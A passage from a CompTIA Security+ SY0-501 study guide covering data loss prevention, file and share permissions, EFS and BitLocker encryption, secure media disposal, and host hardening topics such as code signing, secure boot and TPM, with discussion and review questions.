documents and media be securely disposed of when no longer needed?

CompTIA Security+ Exam SY0-501 291


Chapter 6: Securing hosts and data / Module A: Securing data

Data loss prevention (DLP)


Data loss prevention (DLP) software is used to classify and protect your organization's confidential and
critical data. Within the software, you create rules that prevent users from accidentally or maliciously sharing
particular types of data outside your organization. For example, a DLP rule might prevent users from
forwarding any business emails outside of the corporate mail domain. Another DLP rule might prevent users
from uploading files to a consumer cloud service, like OneDrive or Dropbox. Yet another type of rule would
prevent users from copying files to removable media.

Exam Objective: CompTIA SY0-501 2.1.10, 2.3.6, 2.4.10

An example of DLP being used for email

DLP can be used in a variety of situations. The software can be installed on network perimeters, on endpoint
systems, or in cloud services. Advanced DLP systems even use machine learning algorithms to detect when
data is being accessed or exchanged in an unusual manner.

Big data
Modern businesses might handle relational databases or file servers containing gigabytes or even terabytes of
information. By any historical standard that's enormous, and it can be a challenge to manage it. At the same
time, today's computers are powerful enough that databases of that size can often be processed, stored, and
secured in much the same way that you would handle any other data in a personal folder or shared location.
This isn't true of all data though: many organizations now handle data sets measured in the petabytes or
exabytes. The rapid expanse of data collection and storage technology has helped there, but traditional
analysis and security methods struggle to manage the results.
Big data is a term for data sets too large to be handled by traditional data processing applications. These sets
are used by a lot of fields: scientific data collection, internet search and tracking data, business and finances,
and so on. Very frequently, they hold a variety of data that isn't directly related and isn't directly reviewed or
sorted in the way smaller sets are—it's analyzed for patterns by automated tools and used to recognize trends
or predict outcomes. On top of it all, big data is often in constant real-time availability, accessed broadly
across enterprise networks or via the internet.
Big data can't really be traditionally secured either: since it's so large, and so shared, it doesn't fit easily in the
standard perimeter security model used for sensitive data, and can provide an enormous attack surface. It's
accessed so widely and rapidly that monitoring user transactions with big data sets is impossible without
automated tools. It's also a rapidly changing new technology: commonly administrators are unprepared,

292 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module A: Securing data

applications are immature, and regulatory requirements are unclear. On the up side, big data itself can be used
for security. For example, big data analysis has become a prime tool in the financial industry, tracking for
signs of fraud by searching for anomalous transaction patterns. Either way, if your organization works with
big data, you'll need to study its specific security needs.

Discussion: Data security


1. What sorts of PII does your organization manage?
Answers may vary, but at the least you're likely to have employee and customer data.
2. For some important type of data in your organization, name its owner, custodian, and users.
Answers may vary.
3. How can data in use be compromised? Why would an attacker target it then rather than in transit or at
rest?
Answers may vary, but rootkits and other malware have been designed to do so. Data in use is much less
likely to be encrypted than that sent over a network or even stored in a file.
4. What data loss prevention measures does your organization use?
Answers may vary. There is dedicated DLP software, but many organizations use computer and user
policies instead.

File permissions
On a properly secured host, the first line of security for data are the access control lists (ACLs) used by the
operating system to secure access to resources, including files on disk and other data sources. For example, as
an ordinary Windows user, you can't access the personal documents of other local users on the same computer
—if you try to navigate to those folders or open their files, you'll receive an error message. Likewise, SQL or
other database systems often implement user-based security models, restricting some data to specific users.

Exam Objective: CompTIA SY0-501 4.3.7


Users (or malware) with administrative credentials can overcome these limitations, but against ordinary
malicious users or compromised application, controlling resource permissions can greatly increase data
security. Sensitive data shouldn't be stored on shared network folders unless it must be accessible over the
network; if it must, the folder should be secured so that only intended users can access it. Locally used data
should likewise be stored in folders only readable by users who need it. If data only needs to be accessed by
it's owner, that's simple: by default each user's personal folders are readable only by that user, so private
documents can be stored there.

Directory permissions
On some systems, such as Windows with NTFS and Linux, you can implement file and folder (also referred
to as directory) permissions. with file and folder permissions, you either grant access permissions at various
levels to individual users or groups of users, or you can explicitly deny access. If you explicitly apply the
deny permission for a user or group, it overrides any other permissions they might have assigned. This adds a
layer of security for access to your data.

CompTIA Security+ Exam SY0-501 293


Chapter 6: Securing hosts and data / Module A: Securing data

NTFS permissions

Permission Effect on folder Effect on file


Read User can view the contents of a folder and User can view the contents of the
any subfolders. file.

Write Read permission, plus the user can add files Read permission, plus the user can
and create new subfolders. make changes (write) to the file.

Read & Execute Read permission, plus the user can run Read permission, plus the user can
executable files contained in the folder. This run a file if it is executable.
permission is inherited by any subfolders
and files.

List Folder Contents Read permission, plus the user can run N/A
executable files contained in the folder. This
permission is inherited by subfolders only.

Modify Read and Write permissions, plus the user Read and Write permissions, plus the
can delete the folder. user can delete the file.

Full Control Read, Write, and Modify permissions and Read, write, modify, and delete the
the user can delete all files and subfolders. file.

294 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module A: Securing data

Some caveats to be aware of:


 If you don't assign a permission, no access is the default.
 A user's permissions are the sum of the permissions they have been assigned individually and obtained
through any groups in which they are a member. This is called effective permissions. For example, if
you assign Jake Read permissions to the Reports folder, plus Jake is a member of the Accounting
group, to which you have assigned Modify permissions, then Jake effectively has Modify permissions
on the Reports folder.
 The exception to the "permissions sum" rule is if individually or through a group, Jake was explicitly
denied permissions to the folder. The Deny Access permission takes precedence over all other
permissions a user might inherit.

Linux permissions
In the Linux file system each file or directory (folder) has three basic permission types:
 Read (r): User can view the contents of a file.
 Write (w): User can write to (modify) the contents of a file or directory.
 Execute (x): User can run an executable file and view the contents of a directory.

In Linux, each and every file is owned by a single user and a single group, and has its own access
permissions.
 Owner is the person who is responsible for the file.
 Group includes members of the file's group.
 Others includes all users who are not in the file or folder's group or the owner.

File attributes
File attributes are settings associated with computer files that grant or deny certain rights to how a user or the
operating system can access that file.

CompTIA Security+ Exam SY0-501 295


Chapter 6: Securing hosts and data / Module A: Securing data

 Read-Only (R) - Allows a user or the operating system to read a file, but not write to it.
 Archive (A) - Specifies the file should be backed up.
 System (S) - Indicates the file is a system file and shouldn't be altered or deleted. By default, system
files are hidden.
 Hidden (H) - Suppresses the display of the file in directory lists, unless you issue the command to list
hidden files.
 Directory (D) : Indicates a folder or sub-folder, differentiating them from files.
 Not content-indexed (I) : Windows has a search function that indexes all files and directories on a drive
to achieve faster search results.

Additional attributes are available on NTFS volumes:


 Compressed (C): On an NTFS file system volume, each file and directory has a compression attribute.
Other file systems may also implement a compression attribute for individual files and directories.
 Encrypted (E): On an NTFS file system volume, each file and directory has an encryption attribute as
part of the Encrypting File System (EFS) .

• When you encrypt a directory, all new files created in that directory are encrypted from that point
forward.
• You can select to encrypt the directory's current contents when you perform the encryption.
• Encryption applies to the local system only.
• If you copy an encrypted file or directory to any other file system, the file or directory is no longer
encrypted.
• A file can't be compressed and encrypted at the same time. The attributes are mutually exclusive.
• After you encrypt a file or folder, its name appears in green in Windows Explorer.

In addition to using the Windows interface to modify file and folder attributes, you can also use the
attrib.exe command. Its syntax is: ATTRIB [ + attribute | - attribute ] [pathname]
[/S [/D]].

 + enables the attribute


 - clears the attribute
 pathname: drive and/or filename. For example: C:\documents\*.doc
 /S search the pathname including all subfolders
 /D includes directories in addition to files

296 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module A: Securing data

Share permissions
When a Windows computer is connected to a network, you can share its resources with other users on the
network. This is referred to as a local share . A shared resource can be hardware (such as printer or disk
drive), an application, or a file or folder. Similar to directory permissions, you assign or deny permissions for
each shared resource.
Windows share permissions

Permission Allows user to remotely


Read  View file names and subfolder names
 View data in files
 Run program files

Note: Read is the default Share permission assigned to the Everyone group.

Change All Read share permissions, plus:

 Add files and subfolders


 Change data in files
 Delete subfolders and files

Note: The Change Share permission isn't assigned to any group by default.

Full Control All Read and Change permissions, plus:

 Change file and folder permissions (NTFS files and folders only)
Note: Full Control is the default permission assigned to the Administrators group on the
local computer.

Some things to know about share permissions:


 They apply only to users who gain access to the resource over the network. They do not apply to users
who log on locally. NTFS permissions apply locally.
 They apply to all files and folders in the shared resource. If you need a more detailed level of security
on subfolders and individual files, you will need to use NTFS permissions in addition to share
permissions.
 The only method for securing shared resources on FAT and FAT32 volumes.
 You can specify how many users are allowed to access the resource at one time.

You can control access to shared resources using share permissions, NTFS permissions, or both. If you use
both, be aware that the more restrictive permission always applies. For example, if the share permission is set
at the default (Everyone has Read permissions) and the NTFS permission grants a user the Modify
permission, the share permission applies. The user will not be able to make changes to the file.
Just like with NTFS file permissions, an explicit deny share permission overrides all other permissions to the
shared resource. You'll specifically assign deny permission only when you want to override specific
permissions that are already assigned.

CompTIA Security+ Exam SY0-501 297


Chapter 6: Securing hosts and data / Module A: Securing data

Discussion: File permissions


1. On an NTFS volume, all users on your team have full access permission to the project folder. The one
problem is that it's really easy to delete important files and you'd rather make sure the new guy can read
and edit but not delete anything. How can you do this?
The easiest way would be to add a permission for that one user's account, explicitly denying the Modify
permission but allowing Write. That will override the inherited group permissions.
2. On a Linux volume, what do r, w, and x stand for?
r is Read, w is Write, and x is Execute.
3. How can you secure access to files on a FAT32 volume?
You can only secure them using shared folder permissions. You can't secure them locally. This is part of
why FAT32 shouldn't be used on modern systems.

Storage encryption
File permissions are only one layer of security. Not only can they be circumvented within the operating
system, they don't give any protection at all if you bypass the operating system in the first place. If you have
physical access to a system, you can move its drives to another computer, or boot from a live CD; either
way,you can then bypass the original drive's ACLs. A more secure solution is to encrypt sensitive data so even
someone who can access the file can't read it without a key.
In the past, encryption had a reputation for being slow and cumbersome to use, and strong methods faced
strict legal restrictions. These problems haven't entirely gone away, but there are many options for strong
encryption today, some of which might already be installed on your workstation or removable media.
Since removable storage is at the greatest risk, some USB flash drives have built-in encryption. When you
insert the drive, you can only access a read-only partition holding the encryption software: you need to supply
the key in order to access the rest of the drive. Some include encryption hardware that improves performance
and security. Similarly, nearly all mobile devices include some sort of storage encryption feature, whether or
not it's enabled by default.
When you're transporting files or storing them long-term, you might already compress them into archive
formats like .zip or .rar. Most archive applications allow you to encrypt archive files with a password, but you
need to be careful if you rely on them for security. Traditional .zip archives don't hide the names of files in the
archive, and the content encryption is extremely weak by modern standards. Newer compression programs
can create .zip files with AES encryption that's almost impossible to break with a strong password; alternate
formats like .rar or .7z use AES and even allow you to hide file names.
Some applications allow you to encrypt their data files. In particular, some database applications have a
transparent database encryption (TDE) feature that automatically encrypts all database files and backups,
without affecting application functions.
For more flexible protection of data, especially if you also want to access it normally on your own computer,
there are software applications that will seamlessly encrypt files and folders on your hard drive. For even
more protection you can use full disk encryption (FDE ) to protect entire drives and systems. Some even make
use of hardware acceleration or key generation systems built into many computers, making it more fast and
convenient. There are a variety of commercial solutions available, such as Sophos SafeGuard and Symantec
Endpoint Protection; while the popular freeware TrueCrypt has been discontinued, other non-commercial
options are available.

298 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module A: Securing data

Encryption hardware
On powerful modern computers, encryption and decryption are less of a burden than ever before, but software
methods can still hurt performance, and even if some solutions are quite secure others have vulnerabilities.
For applications that need to be both high performance and high security, it's worth considering hardware that
accelerates or even seamlessly manages data encryption for you.

Exam Objective: CompTIA SY0-501 2.1.17, 3.3.1.1, 3.3.1.2, 3.3.1.3


Hardware including secured cryptoprocessors is available both for removable storage and for computers
themselves.

Self-encrypting A Hard drive or flash drive with a built-in FDE chip, either inside a tamper-resistant
drive case or integrated into the drive controller. Like any FDE solution, the SED encrypts all
data on the drive, rendering it unreadable unless the key is entered during system boot
or when it's connected. Since it has its own encryption hardware, a SED doesn't suffer a
performance hit from encryption, and doesn't require operating system support.
Smart card Smart cards often include cryptographic functions, either to secure their own data or to
store certificates and other cryptographic keys. For example, the SIM cards used in cell
phones securely store the cryptographic keys needed to authenticate and encrypt data on
the cell network.
USB encryption USB hardware dongles can be used to store encryption keys for drive encryption or
other functions. Even ordinary USB flash drives can do the same, though they won't
offer acceleration or the same key security standards.
Trusted platform A standard for generating, storing, and using cryptographic keys by means of a chip
module (TPM) built into a computer, typically installed onto the motherboard. TPM can be used for
drive encryption, digital rights management, or enforcement of software license. They
can also accelerate cryptographic processing itself, boosting encryption performance.
Hardware security A standard for removable devices that provide key storage and cryptographic functions.
module (HSM) A HSM has similar functions to a TPM, but it's a removable card or external device
rather than an intrinsic component. High performance HSMs are typically external
network devices used to secure and accelerate the RSA and ECC cryptography used by
secure websites and financial transactions.

Windows encryption
If you're lucky, your operating system might already include encryption support. There are two encryption
systems included with some Windows editions.
 Encrypting File System allows encryption of individual drives and folders on any NTFS volume. It is
included with Business/Professional/Enterprise/Ultimate editions of Windows, as well as all editions of
Windows Server.
 BitLocker encrypts entire volumes, such as the system drive or even removable drives. It is available on
Enterprise and Ultimate Editions of Windows Vista and 7, Pro and Enterprise versions of Windows 8
and later, and all editions of Windows Server 2008 and later.

CompTIA Security+ Exam SY0-501 299


Chapter 6: Securing hosts and data / Module A: Securing data

It's not a matter of which is better, and even if both are available you'll find that they have different
requirements and serve different purposes. Depending on your needs, you might prefer one or even use both
together.
 EFS is intended for personal files and folders, while BitLocker protects entire drives with personal and
system files alike.
 EFS-encrypted files are unreadable to other users on the same computer. All users on a BitLocker-
encrypted system can access the full system, subject to normal user permissions.
 Any user can independently encrypt files using EFS, while BitLocker must be enabled for the entire
computer by an administrator.
 Each user account has a separate EFS key stored in its settings, and decryption operates transparently
from that user's perspective. BitLocker uses a key for the entire system which must be supplied on
system startup.

In modern versions of windows, both EFS and BitLocker use strong encryption, so if you lose the key your
files might be gone forever. You can export both EFS and BitLocker keys for backup purposes, or assign them
to data recovery agent accounts on a domain. In Windows 8 and later, BitLocker keys can also be stored on a
Microsoft account for recovery.

Encrypting files and folders


You can encrypt personal files or folders from the Advanced Attributes window in Windows Explorer.

1. In Windows Explorer, right-click the file or folder and choose Properties.


2. Click Advanced.
3. In the Advanced Attributes window, check Encrypt contents to secure data.
4. Click OK twice.
• If you encrypted a file you'll be asked whether you want to encrypt the file alone, or its entire parent
folder.
• If you encrypted a folder, you'll be asked whether you want to encrypt the folder alone, or all of its
subfolders and files.
5. Choose the option you want and click OK.

Encrypted file and folder names are green in Windows Explorer.

The first time you use EFS, you'll be prompted to back your key up. You can also back it up at any time by
entering the User Accounts window and clicking Manage your file encryption certificates.

300 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module A: Securing data

BitLocker and BitLocker-To-Go


BitLocker is an entire volume encryption feature included with Windows Vista and Windows 7 Ultimate and
Enterprise editions, and Windows 8 and higher Professional and Enterprise editions. Encrypting the entire
volume protects all of the volume's data, including operating system files, the Windows registry, all temporary
files, and the hibernation file, ensuring the integrity of the trusted boot path (BIOS, boot sector, etc.) and
protecting against boot sector malware.
By default, BitLocker uses a TPM installed in the motherboard. Without the decryption keys, an attacker can't
steal your data by removing your drive, installing it in another computer, and accessing the data. You can add
additional authentication using a USB key or a PIN.
BitLocker can also be used without a TPM. However, you must change the default behavior of BitLocker
either through a group policy or script. When BitLocker is used without a TPM, the encryption keys are
stored on a USB flash drive. This drive must be inserted into the computer to unlock the data stored on the
disk.
BitLocker requires at least two NTFS-formatted volumes: one for the operating system (usually C:) and a
smaller boot volume with a minimum size of 100 MB. The boot volume must be unencrypted. A volume can
be an entire physical drive, just a portion of a physical drive, or can span one or more physical drives. On
Windows Vista you must assign this volume a drive letter, but the drive letter isn't required on Windows 7 and
above.
There are three ways BitLocker can authenticate:
 Transparent operation mode where the user starts up the computer and logs into Windows as normal.
During computer boot, BitLocker verifies that the boot files have not been tampered with. If the boot
files are unmodified, the TPM releases the encryption key and allows the system to boot and load the
operating system. This all happens behind the scenes and is transparent to the user.
 User authentication mode where the user starts up the computer and is prompted to provide a pre-boot
PIN or password. If the user can provide the PIN or password, the system is allowed to boot and load
the operating system.
 USB key mode where the user inserts a USB device containing a startup key into the computer. This
allows the system to boot and load the operating system. In order for this mode to work, you must set
the BIOS to boot from a USB.

BitLocker-To-Go extends the BitLocker encryption feature to removable devices, such as external hard drives
or USB flash drives.

CompTIA Security+ Exam SY0-501 301


Chapter 6: Securing hosts and data / Module A: Securing data

Exercise: Enabling BitLocker


On a computer with a TPM it's easy to enable BitLocker from the Control Panel. If you don't have one, you'll
need to configure it in Local Security Policy, and store the key on a removable drive.

Do This How & Why

1. On the Windows 7 VM, open Local Local Group Policy contains various system security settings,
Group Policy. including for BitLocker.

a) In the Run box, type group.

b) In the results list, click Edit group It may take a few moments, but the Local Group Policy Editor
policy. will open.

2. Edit Bitlocker settings.

a) In the left panel, navigate to Computer Configuration > Administrative Templates > Windows
Components > BitLocker Drive Encryption > Operating System Drives.

302 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module A: Securing data

Do This How & Why

b) Double-click Require additional The first setting on the right.


authentication at startup.

A window pops up with settings, options, and help for the


option. By default, BitLocker is only allowed with a
compatible TPM.

c) Click Enabled. Allow BitLocker without a compatible TPM is checked.

d) Click OK. You'll need to reboot Windows to see changes.

3. Reboot the Windows 7 VM.

4. Configure BitLocker.

a) In the search box, type


bitlocker.

b) Click BitLocker Drive


Encryption/

c) Click Turn On BitLocker. Windows tests to see if your system is compatible with
BitLocker. After a little while, the BitLocker Drive
Encryption window appears.

CompTIA Security+ Exam SY0-501 303


Chapter 6: Securing hosts and data / Module A: Securing data

Do This How & Why

d) Click Next. The next screen warns you that a new system drive will be
created, that you should back up your data, and that the
process might take a while.

e) Click Next, then Restart Now. Note: If you're prompted to format a new drive
on restart, do not do it.

f) When Windows restarts, click Next Since the VM doesn't have a TPM, you'll need a USB drive to
in the BitLocker Drive store your startup key instead. That's a bit of a pain on a VM,
Encryption window. so you won't actually install it.

g) Click Cancel, then click Yes. If you like and you have a USB key, your instructor can walk
you through the rest of the process instead.

Secure media destruction


Data, and its storage media, can be most vulnerable when you throw it away. If data is worth securing in the
first place, it has to be disposed of in a secure fashion as well. For the simplest example, imagine paper
documents holding company secrets. If you just throw them away when you're done someone might literally
dig them out of the trash and make off with them. Instead, you should make sure they're safely shredded. In
fact, for very sensitive documents, shredding often isn't enough, since someone sufficiently motivated could
still reassemble them. Organizations with strict document disposal policies might use more irreversible
methods:

Exam Objective: CompTIA SY0-501 5.8.1, 5.8.5

Pulverizing Hydraulic or pneumatic processing that reduces documents or other items to loose fibers.
Pulping Paper recycling processes that reduce documents to a liquid slurry and separate the ink from
the fibers.
Incineration Burning documents into unrecognizable ash.

The same thing is true of digital media. Not only can valuable files remain on a discarded CD, flash drive, or
hard drive, but the firmware on a computer, router, or other device might have system configuration or other
data useful to an attacker. Even a "failed" hard drive that's no longer accessible by your computer usually has
platters full of readable content that a data recovery lab can easily retrieve. The surest way to ensure the data
is destroyed is to destroy the media or device itself, and the best way to accomplish this depends on the media
and your resources.
 Optical discs are rather fragile: not only can some consumer shredders destroy them, you can also cut
them up with scissors, use something rough or sharp to scratch the upper metallic layer that stores data,
or even put them in the microwave for a flashy, if potentially unsafe, show.
 Backup tapes can be thoroughly destroyed by tape shredders or incineration, though since some media
releases toxic chemicals when burned the latter may be forbidden by local regulation.
 Degaussers use powerful electromagnets to destroy all data on magnetic media like tapes and hard
drives, but not optical or flash storage. Some media can be easily reused after degaussing, but others,
like most hard drives, require specialized tools to reformat
 Industrial shredders or pulverizers can destroy flash drives, hard drives, or even entire computers.

304 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module A: Securing data

 Simple hammers and drills can easily destroy flash chips or hard drive platters. With hard drives, it's
usually easier if you first open the drive cover with a Torx driver.

If you have a lot of media to destroy, it might require a lot of work or specialized equipment. An alternative is
to hire a data destruction service: many offer on-site services and provide certificate of destruction documents
for legal liability or regulatory compliance.

Securely erasing data


If your security needs aren't that extreme, you might not want to destroy expensive erasable media that can be
repurposed, resold, donated, or otherwise recycled. In general, you can do this safely, but you need to use
secure procedures to purge or wipe the original data in a way that makes it genuinely inaccessible.

Exam Objective: CompTIA SY0-501 2.2.8


This isn't as easy as it sounds. Imagine you want to delete some private files from your hard drive before
selling your computer to somewhat untrustworthy acquaintance. If you just delete them, they might go to the
Recycle Bin where they're easily restored. Even if you empty the Recycle Bin, that only removes the file
system's pointer to the data location: if it's not written over by new files, data recovery software could find
and restore it. Even a quick drive reformat only replaces the file system, not the underlying data. Software
rated for data sanitization is the only real option to make sure the device is clear.
In the end, the only way to be really sure data is gone from a storage device is to make sure that every single
bit of it is overwritten with new data, even if it's just writing a string of zeros. For additional security you can
overwrite the same data multiple times, but it takes more time and is best suited for information sensitive
enough that you might rather physically destroy the drive.

 Before erasing any data, make sure that it's safe to delete both in terms of business needs and regulatory
compliance.
 To securely erase files on an active computer, install a secure deletion program. Popular options include
SDlelete, CCleaner, Eraser, and File Shredder. Some will also overwrite all free space on your hard
drive, allowing you to ensure that previously deleted files are gone forever.
 To securely erase an entire hard drive, you'll need a formatting tool that overwrites the entire drive. For
large drives, this can be a time-consuming process.
• Some drive utilities from manufacturers or third party vendors can perform a low-level format which
writes zeroes to the entire drive and restores it to its newly installed configuration. Historically, a true
low level format also defined the tracks and blocks drives use to store data. On today's drives this isn't
generally possible outside the factory, but the term is commonly used for anything that operates
"below" the high level format of the operating system.
• Data destruction utilities can achieve the same result, and usually have other features oriented toward
data disposal rather than drive diagnostics. Examples include DBAN, HDShredder, and KillDisk.
• Drives protected with full disk encryption are easy to securely erase. Securely deleting or overwriting
the encryption key will render all existing files unreadable.
 In order to maximize the limited lifespan of flash memory, SSDs move data around as it's written and
deleted. The details aren't important, but an unfortunate side effect is that it makes it difficult to be sure
any particular data is really gone. Some SSD manufacturers offer utilities for secure drive wiping.
 Firmware and settings in computer hardware, network appliances and mobile devices can hold valuable
information. Consult documentation for the device to see if it can be securely deleted, or simply destroy
the device.

CompTIA Security+ Exam SY0-501 305


Chapter 6: Securing hosts and data / Module A: Securing data

Discussion: Secure data disposal


1. What policies does your organization have for data disposal?
Answers may vary.
2. What tools do you or your organization have at hand to securely destroy paper documents or digital
media?
Answers may vary.
3. You want to sell or donate a computer that held sensitive data. Why might reformatting the drive not be
enough to satisfy secure disposal goals?
A quick format can leave readable data, and even full formatting of a SSD might leave readable sectors.
You need to perform a secure data purge. Additionally, you need to make sure no device firmware settings
contain confidential configuration details.

306 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module A: Securing data

Assessment: Securing data


1. Which Windows encryption tool can protect the entire system volume? Choose the best response.
 BitLocker
 Encrypting File System
 Both
 Neither

2. Your organization has a degausser in the basement. What media can you use it to securely destroy?
Choose all that apply.
 Backup tapes
 CDs and DVDs
 Hard drives
 Paper documents
 SSDs

3. What cryptographic tool is commonly built into a motherboard?


 FDE
 DLP
 HSM
 TPM

4. What might protect users from copying sensitive files to external media?
 FDE
 DLP
 HSM
 TPM

5. "Big data" shouldn't be confused with "cloud storage"? True or false?


 True
 False

6. Your organization has a critical database full of customer PII, and a new employee was just authorized to
use it. How would you best describe the role of the system administrator who configures user permissions
in the database software?
 Data custodian
 Data owner
 Data steward
 Privacy officer

CompTIA Security+ Exam SY0-501 307


Chapter 6: Securing hosts and data / Module B: Securing hosts

Module B: Securing hosts


Every host on your network needs to be kept secure regardless of the data it holds. The value of servers is
obvious for security, but workstations are the systems most often exposed to malware infestations, and most
easily compromised by user error. Many users, home or business, might say "but my computer doesn't have
valuable information, I don't care if the hackers get at it." It's a dangerous attitude: even such a computer
likely has user credentials, saved passwords, and personal information that can be stolen and used elsewhere.
Even if it doesn't, spyware can capture credentials when the user logs onto a company server or bank website.
Even without data breaches, compromised systems are time-consuming to fix, so preventative maintenance is
an effective use of resources.
You will learn:
 About security baselines
 How to secure hosts
 How to perform patch management
 How to secure static and unconventional systems

Security baselines
Much as with data or anything else, securing hosts begins with designing policies that meet your security
needs but are practical to support. You should define a security baseline, or minimum set of standards. Every
host you deploy must be configured to meet the baseline, and any later changes must be reviewed to make
sure security doesn't fall below the baseline. You can't rely on the state of a system out of the box to meet a
security baseline either. Most hardware and software products have a default configuration intended to make
them easy to set up and use in a safe environment, even including things like a default administrator account
and password anyone can look up online.

Exam Objective: CompTIA SY0-501 1.6.5, 1.6.6, 2.3.11, 3.3.2.5


Much like with network segments or data, you might configure multiple security baselines for hosts that have
different security needs. Most likely a workstation and a server will have different baselines, or one on an
internal network vs. one on the perimeter. Areas a baseline might define include the following:
 Operating system configuration
 Host-based firewall and IDS software and settings
 Antimalware software
 Required and disallowed applications
 Application security settings
 Patches and updates
 Physical security
 User training procedures

Since system configurations have a way of changing or falling out of sync when you're not looking, security
audits and evaluations should ensure that all hosts still meet the baseline. There are automated tools you can
use to verify some baseline features. For example, Microsoft Baseline Security Analyzer checks a variety of
Windows components and Microsoft products at once to make sure they're up to date and securely configured.
It can also be used to scan other computers on the network.

308 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module B: Securing hosts

When you have a number of identical systems to deploy, a good way to save time is to create a single system
image configured to the security baseline, and install it to all hosts.

Code signing
Maliciously or carelessly modified software is always a risk, and it can happen on any level. Applications,
drivers, operating systems, and firmware all can be modified by malware or directly by an attacker. The risk is
highest with user-installed applications, but even when you're installing a driver or booting up your operating
system you probably want to be sure it's unmodified and comes from who it claims it does.

Exam Objective: CompTIA SY0-501 2.4.3, 3.6.5.5


A popular solution is code signing, which uses a digital certificate to cryptographically sign code. Whoever
wants to run it can then use the signature to verify the creator of the program and that it hasn't been changed
since it was signed. Most code signing systems allow developers to sign all protected executables and
libraries on building before they're distributed. Before installing or running signed code, the host system can
verify its signatures to make sure that they're trusted.
Most modern operating systems allow checking for code signatures, and it's strong security when properly
implemented, but you should also know its limitations.
 A signature doesn't verify that software is safe, only that the signer claims it is safe. Only trust
signatures when they come from sources that you trust.
 Private signing keys can be compromised. Even if a compromised certificate has been revoked, you'll
need network access to a CA to be certain of it.
 Code signing only gives protection if the operating system is configured to check for signatures. Even
then, depending on system security policies users may be permitted to run unsigned code or code from
untrusted sources. Stricter security settings can block software from running if it isn't signed by an
approved publisher.

CompTIA Security+ Exam SY0-501 309


Chapter 6: Securing hosts and data / Module B: Securing hosts

Trusted hardware and firmware


One of the primary rules about attacks of any kind is that there's no reason to attack a security control head-on
when you can avoid it, or infiltrate it from a trusted direction. On the host level, this often means exploiting
vulnerabilities that give low-level, privileged access to sensitive functions. Since higher abstraction layers
tend to trust lower abstraction layers, compromising a low-level component allows easy attacks against higher
layers. For example, rootkits are so dangerous because they can subvert the operating system and application
security controls that could catch other malware, and backdoors because they bypass existing access control
measures. Especially with physical access, an attacker can modify a computer's operating system or firmware
without its user's knowledge, preventing it from enforcing other security policies.

Exam Objective: CompTIA SY0-501 3.3.1.4, 3.3.1.5, 3.3.1.6, 3.3.1.7, 3.4.4


Creating a trusted system that can be relied on to enforce security from the hardware up isn't entirely easy.
You can use code signing to make sure the operating system verifies the applications you run and drivers you
load, but what verifies that the operating system hasn't been modified? Fundamentally, every trust chain goes
back to a root of trust, a certificate or other form of authentication. For secure websites and web applications,
the root of trust is the root CA certificates installed with your browser. For local applications, the root of trust
can be in the operating system's certificate store. But to protect the operating system itself, the root of trust
must be embedded into the hardware or firmware.
One approach rootkits often take is to compromise the boot loader to take control at the lowest level. To
prevent this, UEFI supports a feature called secure boot, that relies on a public platform key (PK) stored in the
firmware itself and serving as a root of trust for the operating system and drivers. With secure boot enabled,
the computer will refuse to use any bootloader that isn't signed by the PK's owner. The PK is also used to
verify signatures on device drivers, though the operating system can still be configured to allow unsigned
drivers. Most commercial motherboards are shipped with a Microsoft PK that supports Windows and a
handful of Linux distributions with secure boot support. If you want to use other operating systems or just to
really own your root of trust, you can replace the PK with one of your own,. This means you'll need to sign
the bootloader and drivers yourself.
A TPM installed onto a motherboard is an even more secure and flexible root of trust. The TPM doesn't only
store keys in protected hardware and support more of them than UEFI, but it supports a number of other
cryptographic functions that can be used to authenticate operating systems and other software.
 With a built-in cryptoprocessor and key generation functions, a TPM can be used to contact external
servers and provide remote attestation that software is genuine. This can work multiple ways. In one
direction, if software you want to run isn't directly trusted by a TPM key, it can be verified against an
external server which the TPM trusts. In the other direction, the TPM can verify the signatures of
software on the local machine as part of a network authentication process like joining a VPN. Then it
can provide hardware-level authentication that the client machine has not been compromised.
 Using cryptographic features and secured storage, the TPM can perform more complex integrity
measurement to verify not only that individual pieces of software are signed but that combinations of
software and configuration inputs all match an established baseline. To do so it creates a hash of the
combination of all of these factors, verifying it against a stored value or a remote authenticator.

Finally, it's always possible that firmware itself could be compromised, especially but not exclusively when
you're dealing with industrial or embedded systems. In extreme cases, attackers could install hardware
keyloggers or other physical devices. While this isn't a very likely attack, if you're really serious about
security you need to make sure your supply chain is secure. If there's any possibility of modification before a
device reaches you, or when it's been left unsecured, you must verify that hardware and firmware haven't been
modified.

Trusted operating systems


By securely configuring host operating systems, you can greatly reduce their attack surface. The first step is
choosing an operating system that's designed securely in the first place. Governments typically publish

310 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module B: Securing hosts

trusted operating system (TOS) standards for operating system security. TOS standards tend to require strong
authentication and authorization features that control both user and application privileges to an end goal of
least functionality. As bad as that sounds, it's just another form of least privilege: any function a legitimate
user does not need might be more useful to an attacker.

Exam Objective: CompTIA SY0-501 3.3.2.4, 3.3.2.6


The most common TOS standard is the Common Criteria (CC) defined by ISO 15408. It rates operating
systems by a numerical Evaluation Assurance Level (EAL), ranging from 1 to 7. A typical well-secured
commercial operating system is EAL 4: legacy or low-security operating systems are lower, while higher
levels are reserved for specialized high-security applications. For example, some of the newest military jets
use computers with EAL 6 operating systems.

Hardening operating systems


A trusted OS has strong security features, but only when it's correctly configured. When deploying a system,
take steps to make sure it's hardened out of the box, and correct it if it's not. While the overall principles of
hardening hosts are universal, the details depend on the operating system and version as well as what you plan
to use it for. The same physical computer might be used for a workstation, a server, or even a network
appliance. What's more, the three could be different operating systems, or just the same operating system
configured in three different ways.

Exam Objective: CompTIA SY0-501 3.3.2.1.1, 3.3.2.1.2, 3.3.2.1.3, 3.3.2.3

 Ensure that the operating system version is still supported and regularly receiving security updates. Even
if legacy operating systems were securely designed at the time, they can be a security risk as threats
evolve.
 Enable and enforce account control features.
• Restrict privileged and administrator accounts to users who actually need them. In particular, ordinary
desktop users should not have administrator rights.
• Restrict or disable remote access to administrator accounts.
• Disable unnecessary accounts such as guest or user accounts.
